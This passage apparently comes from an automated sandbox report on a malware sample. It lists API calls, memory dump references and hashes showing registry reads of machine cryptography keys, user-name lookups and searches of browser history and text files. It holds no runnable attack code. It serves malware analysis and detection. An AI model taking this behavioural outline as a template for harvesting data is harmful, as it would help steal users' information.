                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocString
                                                                                                            • String ID: SOFTWARE\Microsoft\Cryptography
                                                                                                            • API String ID: 2525500382-1514646153
                                                                                                            • Opcode ID: 76b0c5c92c78ac420becf6784fc6a1da342b91989b07b055a819ce3e10a128ad
                                                                                                            • Instruction ID: b7488d83487bcecb75417ccbdbd58e5acfbbdb6a2dc67c9614fc1c7d46415314
                                                                                                            • Opcode Fuzzy Hash: 76b0c5c92c78ac420becf6784fc6a1da342b91989b07b055a819ce3e10a128ad
                                                                                                            • Instruction Fuzzy Hash: D2D012F42006025AD7488E29855593B776E5BD1700328867EA101AF2C4DB39E841DB38
                                                                                                            APIs
                                                                                                              • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                                                              • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                                                              • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                                                              • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                                                            • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,004020D8), ref: 00401FA7
                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0041C5B4,004020DF), ref: 004020D2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 2227675388-0
                                                                                                            • Opcode ID: 0c1c8bb305bbff8ba2aa7aa2b7d32e669c82bb45643f7d7afb35836f5abc82eb
                                                                                                            • Instruction ID: 60aaef5d71d1198278099ac2c9ce8b9a20775f5f033974ed56173d7c89f55220
                                                                                                            • Opcode Fuzzy Hash: 0c1c8bb305bbff8ba2aa7aa2b7d32e669c82bb45643f7d7afb35836f5abc82eb
                                                                                                            • Instruction Fuzzy Hash: DA41CDB1A813019FD714CF29DDC56AABBA1EB59318B24C27FD505E77E1E378A841CB08
                                                                                                            APIs
                                                                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407D02), ref: 00407CD5
                                                                                                            • FreeSid.ADVAPI32(00000000,00407D09), ref: 00407CFC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CheckFreeMembershipToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 3914140973-0
                                                                                                            • Opcode ID: 684da7f1912ccf8d100af4d66f16fe37e0ade1452f73a65b9e57601f8946f401
                                                                                                            • Instruction ID: b2bf85b2e2b23abc2f4a0e5b7d3564ce2fd94028ae90e1c3f906036a39e7bd64
                                                                                                            • Opcode Fuzzy Hash: 684da7f1912ccf8d100af4d66f16fe37e0ade1452f73a65b9e57601f8946f401
                                                                                                            • Instruction Fuzzy Hash: 97216F75A48348BEE701CBA8CC45FAE77FCEB09704F4084B2F510E3291D375AA08875A
                                                                                                            APIs
                                                                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407D02), ref: 00407CD5
                                                                                                            • FreeSid.ADVAPI32(00000000,00407D09), ref: 00407CFC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CheckFreeMembershipToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 3914140973-0
                                                                                                            • Opcode ID: 3350cafe3f8cf2e0daa8d574530435bc3faf7afc8018acb51f9e67137038bbf3
                                                                                                            • Instruction ID: 07ef963ec0b68deb3fcaff7dc025a93d4964a205a3b7442176a44215fb39e405
                                                                                                            • Opcode Fuzzy Hash: 3350cafe3f8cf2e0daa8d574530435bc3faf7afc8018acb51f9e67137038bbf3
                                                                                                            • Instruction Fuzzy Hash: B6215E75A48248BEE701CBA8DC81FAE77F8EB09700F5085B2F510E36E1D375AA098759
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                                                                                            • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407642
                                                                                                            • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 00407669
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocOpenQueryStringValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139485348-0
                                                                                                            • Opcode ID: fe58c2676ed98402a924e622f15a72af40503da2610d54ccfcf300c1ae47a28e
                                                                                                            • Instruction ID: 85569b86d54529dfd8c79574c565d9cfa8ba7989ecb8e03db7b7756a239e94ff
                                                                                                            • Opcode Fuzzy Hash: fe58c2676ed98402a924e622f15a72af40503da2610d54ccfcf300c1ae47a28e
                                                                                                            • Instruction Fuzzy Hash: 9B210A71A44208AFD700EB99CD82EEEB7FCEF48704F5040B6B519E72A1D774AE448B65
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,00418717,00000000), ref: 00403479
                                                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,00418717,00000000), ref: 004034AE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitFreeLibraryProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1404682716-0
                                                                                                            • Opcode ID: 83c72d89bf64d36d3e307e14c4e851507ac80ccff3e714fe6ab68af5963cad7f
                                                                                                            • Instruction ID: 3efb88752543cb7b7411b8850ba760202313331cae5217d67b69a3078a3e17bb
                                                                                                            • Opcode Fuzzy Hash: 83c72d89bf64d36d3e307e14c4e851507ac80ccff3e714fe6ab68af5963cad7f
                                                                                                            • Instruction Fuzzy Hash: 772162709002408BDB229F6684847577FD9AB49356F2585BBE844AF2C6D77CCEC0C7AD
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,00418717,00000000), ref: 00403479
                                                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,00418717,00000000), ref: 004034AE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitFreeLibraryProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1404682716-0
                                                                                                            • Opcode ID: 712c545abaf320befb2a29c50df4fdabf10e6ed2be12c49fdfa7e8256cdbd3e8
                                                                                                            • Instruction ID: a7f10c8a2f0efa7893578dab7d1fe92da90b98ef6ff2cf319ec6d8299990f2f9
                                                                                                            • Opcode Fuzzy Hash: 712c545abaf320befb2a29c50df4fdabf10e6ed2be12c49fdfa7e8256cdbd3e8
                                                                                                            • Instruction Fuzzy Hash: 922132709002408FDB229F6584847567FA9AF49316F1585BBE844AE2D6D77CCAC0C79D
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,00418717,00000000), ref: 00403479
                                                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,00418717,00000000), ref: 004034AE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitFreeLibraryProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1404682716-0
                                                                                                            • Opcode ID: 1d3e21be2f222e88a5ce5129c4af818b1f382a2d1c87c05034a25e8df98eeb83
                                                                                                            • Instruction ID: 9b75380a0c1bb1c5ffdc64597b03c40b9c34cb72d282d073c18e6e74c6ec6d76
                                                                                                            • Opcode Fuzzy Hash: 1d3e21be2f222e88a5ce5129c4af818b1f382a2d1c87c05034a25e8df98eeb83
                                                                                                            • Instruction Fuzzy Hash: F42141709002408BDB229F6684847567FA9AF49316F2585BBE844AE2C6D77CCAC0CB9D
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                                                                                            • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406EC8
                                                                                                            • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406EEF
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocFreeOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 967375698-0
                                                                                                            • Opcode ID: 75d402b96af35ef4be622c85e7f42c5874bf5a9438753516473e280561b1ff26
                                                                                                            • Instruction ID: 95dba4e9abc9c412b13e6587c625634e660d61312d90d7235186b1c7fae4ad03
                                                                                                            • Opcode Fuzzy Hash: 75d402b96af35ef4be622c85e7f42c5874bf5a9438753516473e280561b1ff26
                                                                                                            • Instruction Fuzzy Hash: DB114970600209AFD700EF98D992ADEBBFCEF48704F4000B6B508E7291E774AB448BA5
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                                                                                            • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406EC8
                                                                                                            • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406EEF
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocFreeOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 967375698-0
                                                                                                            • Opcode ID: 93ffc18aff940630c773c39f869c9b73eb077ec6050040de7a5362879dcd2ece
                                                                                                            • Instruction ID: d6839de15ce0d986496e2f56cedbfcdd5c795bc72117923b9a37f873fbd9eab1
                                                                                                            • Opcode Fuzzy Hash: 93ffc18aff940630c773c39f869c9b73eb077ec6050040de7a5362879dcd2ece
                                                                                                            • Instruction Fuzzy Hash: E0111971640209AFD700EB99DD86EDEBBFCEF48704F5000B6B508E7291DB74AB448A65
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$AllocFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 2087232378-0
                                                                                                            • Opcode ID: 3a030dae07bd12be1e8916226aea606fe10224b866e5fde08d2ce5627efe4e03
                                                                                                            • Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
                                                                                                            • Opcode Fuzzy Hash: 3a030dae07bd12be1e8916226aea606fe10224b866e5fde08d2ce5627efe4e03
                                                                                                            • Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                                                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,004077B8,?,0041CA58,?,?,004096E8,00000000,00000000,00000000,00409963,?,?,?,00000000), ref: 0040779A
                                                                                                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocAttributesFileFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 2634384563-0
                                                                                                            • Opcode ID: 8810337ccaa0ea54d61b76612c76d4f3deadb12b9a49095d69064cceecd31e12
                                                                                                            • Instruction ID: 455f119eb2bdff77f9424d14ab95cdd3c78d1bf311641bba7c090798075f41e3
                                                                                                            • Opcode Fuzzy Hash: 8810337ccaa0ea54d61b76612c76d4f3deadb12b9a49095d69064cceecd31e12
                                                                                                            • Instruction Fuzzy Hash: 3CF0A070504208AFC301EB65CC4289D7BECEB49B103A10577F410E3690E734BF009525
                                                                                                            APIs
                                                                                                            • GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041874E,?), ref: 0040660D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: NameUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2645101109-0
                                                                                                            • Opcode ID: 153b4ec9fa6da1239e45f29a021cf1180a625503ea610292dda7591db46c391b
                                                                                                            • Instruction ID: 5a5990060c673b8f00593b581c9a0ee3644ab744bab1f058c1932740bd518d27
                                                                                                            • Opcode Fuzzy Hash: 153b4ec9fa6da1239e45f29a021cf1180a625503ea610292dda7591db46c391b
                                                                                                            • Instruction Fuzzy Hash: 1BE0DFB12083424FC3119BA8D880AA53BE49F49300F044876B8D5C72E1FE35CE248753
                                                                                                            APIs
                                                                                                            • GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041874E,?), ref: 0040660D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: NameUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2645101109-0
                                                                                                            • Opcode ID: 60f9d436da294c5ff49d132d20e00676374c28b1533c3170959a1c115f4756e2
                                                                                                            • Instruction ID: 7803372b71e91cd4900786e151d6695f3fca8b78fda9d7e8201226f5ab6c0eae
                                                                                                            • Opcode Fuzzy Hash: 60f9d436da294c5ff49d132d20e00676374c28b1533c3170959a1c115f4756e2
                                                                                                            • Instruction Fuzzy Hash: D7E08CB16043065BD3109AA8D880AAA76E89B88300F00493AB89AD73D0FE39CE248647
                                                                                                            APIs
                                                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403BBB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocString
                                                                                                            • String ID:
                                                                                                            • API String ID: 2525500382-0
                                                                                                            • Opcode ID: 0100b19e5ea0ce085f6791d6055cf17ebcb7f85dc8371484061749cb1acedcd1
                                                                                                            • Instruction ID: cc320876a9625d104608ea07d28c2a31881d354d5da6284e066d4471a5eebec8
                                                                                                            • Opcode Fuzzy Hash: 0100b19e5ea0ce085f6791d6055cf17ebcb7f85dc8371484061749cb1acedcd1
                                                                                                            • Instruction Fuzzy Hash: 9AB0922425860120EA6418620A01B33185C0B60B4BF880037AD20F41C2D96DE901503A
                                                                                                            APIs
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00403BD3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeString
                                                                                                            • String ID:
                                                                                                            • API String ID: 3341692771-0
                                                                                                            • Opcode ID: 4922c5fd9d3a0b2b3f5f47c82899ed0dbd9246eb6c6f0e0d0d4e4ac0480ba6a2
                                                                                                            • Instruction ID: b74080e8723bd2c965acb067c4bb7b075115b3c8c25a1433ae70b86ac4b73cdf
                                                                                                            • Opcode Fuzzy Hash: 4922c5fd9d3a0b2b3f5f47c82899ed0dbd9246eb6c6f0e0d0d4e4ac0480ba6a2
                                                                                                            • Instruction Fuzzy Hash: 0BA0247C10030354CF0F351F000041331353FD03073C4C47D51003D1515D3F54004114
                                                                                                            APIs
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,-00000008,00003FFB,00401817), ref: 0040160A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1263568516-0
                                                                                                            • Opcode ID: b291eff7d8b065b47bfa4970d5e5377ccb2b015cdc94aedb823a1819aa810e09
                                                                                                            • Instruction ID: 104411973d7795ae4b76250d277c099600c8cf09cd5a8da0f47b470ca133b76a
                                                                                                            • Opcode Fuzzy Hash: b291eff7d8b065b47bfa4970d5e5377ccb2b015cdc94aedb823a1819aa810e09
                                                                                                            • Instruction Fuzzy Hash: 82012B726443105FC3109F28DDC0E6A77E5DBC5324F19493EDA85AB391D33B6C0187A8
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,0041A232), ref: 00414115
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeString$FileFindFirst
                                                                                                            • String ID: .LNK$._.$8?A$T_@
                                                                                                            • API String ID: 1653790112-814392791
                                                                                                            • Opcode ID: 1d8af5ad470fc4bede735bce2fb3fa085eec8a0803dd75236fea097156046d72
                                                                                                            • Instruction ID: ccf2d574420f699031c81d78e58b697f7985245bee10ad08c344e755ebce9b4b
                                                                                                            • Opcode Fuzzy Hash: 1d8af5ad470fc4bede735bce2fb3fa085eec8a0803dd75236fea097156046d72
                                                                                                            • Instruction Fuzzy Hash: C2223F74A0011E9BDB10EF55C985ADEB7B9EF84308F1081B7E504B7291DB38AF868F59
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FD4,?,00000000,?,00000000,?,00413361,00000000,00000000,00413B6D,?,00000000,00000024), ref: 00412E0B
                                                                                                              • Part of subcall function 0040776C: GetFileAttributesW.KERNEL32(00000000,00000000,004077B8,?,0041CA58,?,?,004096E8,00000000,00000000,00000000,00409963,?,?,?,00000000), ref: 0040779A
                                                                                                            • FindNextFileW.KERNEL32(?,?,0041C91C,00412FFC,?,00412FFC,0041A232,00000000,?,00000000,00412FD4,?,00000000,?,00000000), ref: 00412F5D
                                                                                                            • FindClose.KERNEL32(?,?,?,0041C91C,00412FFC,?,00412FFC,0041A232,00000000,?,00000000,00412FD4,?,00000000,?,00000000), ref: 00412F6E
                                                                                                              • Part of subcall function 00412974: GetTickCount.KERNEL32 ref: 004129B8
                                                                                                              • Part of subcall function 00412974: 6BD67450.KERNEL32(00000000,00000000,000000FF,?,00412C78,?,.tmp,?,?,00000000,00412BB7,?,00000000,00412C41,?,00000000), ref: 00412A34
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$AllocAttributesCloseCountD67450FirstNextStringTick
                                                                                                            • String ID: .txt$\*.*$\History
                                                                                                            • API String ID: 3882801140-2232271174
                                                                                                            • Opcode ID: d5d256c756bc9a0ca0ba1b22b5d48c2297ca2773f1b472ef4f445c44d961df31
                                                                                                            • Instruction ID: b8b382f9890bf67c4ce716ca2eff32e8703a5b333aba7ace94e6d5da5dd104b6
                                                                                                            • Opcode Fuzzy Hash: d5d256c756bc9a0ca0ba1b22b5d48c2297ca2773f1b472ef4f445c44d961df31
                                                                                                            • Instruction Fuzzy Hash: 14514C749042199BCF50EF61CD89ACDBBB8FB48304F5041FAA108B3291DB789F959F14
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0041328E,?,00000000,?,00000000,?,00413A53,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004130CF
                                                                                                              • Part of subcall function 0040776C: GetFileAttributesW.KERNEL32(00000000,00000000,004077B8,?,0041CA58,?,?,004096E8,00000000,00000000,00000000,00409963,?,?,?,00000000), ref: 0040779A
